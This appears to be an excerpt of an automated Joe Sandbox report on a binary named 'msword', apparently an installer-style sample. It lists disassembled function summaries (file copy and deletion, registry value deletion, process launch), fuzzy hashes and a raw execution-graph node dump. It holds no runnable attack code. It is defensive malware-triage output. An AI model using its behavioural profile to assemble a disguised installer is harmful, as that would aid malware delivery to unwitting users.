                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                        • API String ID: 1697273262-1764544995
                                                                        • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                        • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                        • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                        • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 00404902
                                                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID: $@rD
                                                                        • API String ID: 3748168415-881980237
                                                                        • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                        • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                        • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                        • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                        APIs
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                          • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                        • API String ID: 2577523808-3778932970
                                                                        • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                        • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                        • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                        • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcatwsprintf
                                                                        • String ID: %02x%c$...
                                                                        • API String ID: 3065427908-1057055748
                                                                        • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                        • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                        • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                        • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 00405057
                                                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                        • API String ID: 2266616436-4211696005
                                                                        • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                        • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                        • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                        • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00402100
                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                        • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                        • String ID:
                                                                        • API String ID: 1599320355-0
                                                                        • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                        • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                        • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                        • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                        APIs
                                                                          • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                                        • String ID: Version
                                                                        • API String ID: 512980652-315105994
                                                                        • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                        • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                        • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                        • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                        • GetTickCount.KERNEL32 ref: 00403303
                                                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                        • String ID:
                                                                        • API String ID: 2102729457-0
                                                                        • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                        • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                        • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                        • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                        • String ID:
                                                                        • API String ID: 2883127279-0
                                                                        • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                        • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                        • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                        • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                        APIs
                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                        • String ID: !N~
                                                                        • API String ID: 623250636-529124213
                                                                        • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                        • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                        • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                        • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                        APIs
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                        • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                        Strings
                                                                        • Error launching installer, xrefs: 00405C48
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateHandleProcess
                                                                        • String ID: Error launching installer
                                                                        • API String ID: 3712363035-66219284
                                                                        • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                        • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                        • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                        • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                        • API String ID: 3509786178-2769509956
                                                                        • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                        • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                        • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                        • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                        • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                        • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                        • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                        • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                        Execution Graph

                                                                        Execution Coverage:4.2%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:2.4%
                                                                        Total number of Nodes:2000
                                                                        Total number of Limit Nodes:46
101053->101051 101080 10032e5 58 API calls 3 library calls 101053->101080 101057 1009ecf __mtinitlocknum 101056->101057 101058 1009ef0 101057->101058 101059 1009ed8 101057->101059 101068 1009f11 __mtinitlocknum 101058->101068 101084 1008a4d 58 API calls 2 library calls 101058->101084 101081 100a39b 58 API calls __NMSG_WRITE 101059->101081 101061 1009edd 101082 100a3f8 58 API calls 6 library calls 101061->101082 101064 1009f05 101066 1009f1b 101064->101066 101067 1009f0c 101064->101067 101065 1009ee4 101083 10032cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101065->101083 101071 1009e3b __lock 58 API calls 101066->101071 101085 1008d58 58 API calls __getptd_noexit 101067->101085 101068->101053 101073 1009f22 101071->101073 101074 1009f47 101073->101074 101075 1009f2f 101073->101075 101087 1002f85 101074->101087 101086 100a05b InitializeCriticalSectionAndSpinCount 101075->101086 101078 1009f3b 101093 1009f63 LeaveCriticalSection _doexit 101078->101093 101081->101061 101082->101065 101084->101064 101085->101068 101086->101078 101088 1002fb7 _free 101087->101088 101089 1002f8e RtlFreeHeap 101087->101089 101088->101078 101089->101088 101090 1002fa3 101089->101090 101094 1008d58 58 API calls __getptd_noexit 101090->101094 101092 1002fa9 GetLastError 101092->101088 101093->101068 101094->101092 101095->101040 101096->101043 101097->101044 101101 1009fa5 LeaveCriticalSection 101098->101101 101100 1002eb7 101100->101031 101101->101100 101102->100800 101103->100789 101104->100800 101105->100798 101106->100800 101108 ff1207 59 API calls 101107->101108 101109 1044024 101108->101109 101110 ff1207 59 API calls 101109->101110 101111 104402d 101110->101111 101112 ff1207 59 API calls 101111->101112 101113 1044036 101112->101113 101131 1000284 101113->101131 101118 104405c 101143 1000119 101118->101143 101119 ff1900 59 API calls 101119->101118 101121 1044070 FindFirstFileW 101122 10440fc FindClose 101121->101122 101125 104408f 101121->101125 101126 1044107 
Mailbox 101122->101126 101123 10440d7 FindNextFileW 101123->101125 101124 ff1c9c 59 API calls 101124->101125 101125->101122 101125->101123 101125->101124 101194 ff17e0 101125->101194 101203 ff1900 101125->101203 101126->100807 101130 10440f3 FindClose 101130->101126 101210 1011b70 101131->101210 101134 10002b0 101216 ff1821 101134->101216 101135 10002cd 101225 ff19e1 101135->101225 101138 10002bc 101212 ff133d 101138->101212 101141 1044fec GetFileAttributesW 101142 104404a 101141->101142 101142->101118 101142->101119 101144 ff1207 59 API calls 101143->101144 101145 100012f 101144->101145 101146 ff1207 59 API calls 101145->101146 101147 1000137 101146->101147 101148 ff1207 59 API calls 101147->101148 101149 100013f 101148->101149 101150 ff1207 59 API calls 101149->101150 101151 1000147 101150->101151 101152 100017b 101151->101152 101153 103627d 101151->101153 101154 ff1462 59 API calls 101152->101154 101155 ff1c9c 59 API calls 101153->101155 101156 1000189 101154->101156 101157 1036286 101155->101157 101158 ff1981 59 API calls 101156->101158 101159 ff19e1 59 API calls 101157->101159 101160 1000193 101158->101160 101162 10001be 101159->101162 101161 ff1462 59 API calls 101160->101161 101160->101162 101165 10001b4 101161->101165 101163 10001fe 101162->101163 101166 10001dd 101162->101166 101176 10362a6 101162->101176 101237 ff1462 101163->101237 101168 ff1981 59 API calls 101165->101168 101250 ff1609 101166->101250 101167 100020f 101172 1000221 101167->101172 101174 ff1c9c 59 API calls 101167->101174 101168->101162 101169 1036376 101173 ff1821 59 API calls 101169->101173 101175 1000231 101172->101175 101178 ff1c9c 59 API calls 101172->101178 101189 1036333 101173->101189 101174->101172 101180 1000238 101175->101180 101181 ff1c9c 59 API calls 101175->101181 101176->101169 101179 103635f 101176->101179 101188 10362dd 101176->101188 101177 ff1462 59 API calls 101177->101163 101178->101175 101179->101169 101185 103634a 101179->101185 101182 ff1c9c 59 API calls 
101180->101182 101191 100023f Mailbox 101180->101191 101181->101180 101182->101191 101183 ff1609 59 API calls 101183->101189 101184 103633b 101186 ff1821 59 API calls 101184->101186 101187 ff1821 59 API calls 101185->101187 101186->101189 101187->101189 101188->101184 101192 1036326 101188->101192 101189->101163 101189->101183 101253 ff153b 59 API calls 2 library calls 101189->101253 101191->101121 101193 ff1821 59 API calls 101192->101193 101193->101189 101195 102f401 101194->101195 101196 ff17f2 101194->101196 101261 10387f9 59 API calls _memmove 101195->101261 101255 ff1680 101196->101255 101199 ff17fe 101199->101125 101200 102f40b 101201 ff1c9c 59 API calls 101200->101201 101202 102f413 Mailbox 101201->101202 101204 102f534 101203->101204 101205 ff1914 101203->101205 101207 ff1c7e 59 API calls 101204->101207 101262 ff18a5 101205->101262 101209 102f53f __NMSG_WRITE _memmove 101207->101209 101208 ff191f DeleteFileW 101208->101123 101208->101130 101211 1000291 GetFullPathNameW 101210->101211 101211->101134 101211->101135 101213 ff134b 101212->101213 101229 ff1981 101213->101229 101215 ff135b 101215->101141 101217 ff182d __NMSG_WRITE 101216->101217 101218 ff189a 101216->101218 101220 ff1868 101217->101220 101221 ff1843 101217->101221 101219 ff1981 59 API calls 101218->101219 101224 ff184b _memmove 101219->101224 101234 ff1c7e 101220->101234 101233 ff1b7c 59 API calls Mailbox 101221->101233 101224->101138 101226 ff19fb 101225->101226 101228 ff19ee 101225->101228 101227 1000fe6 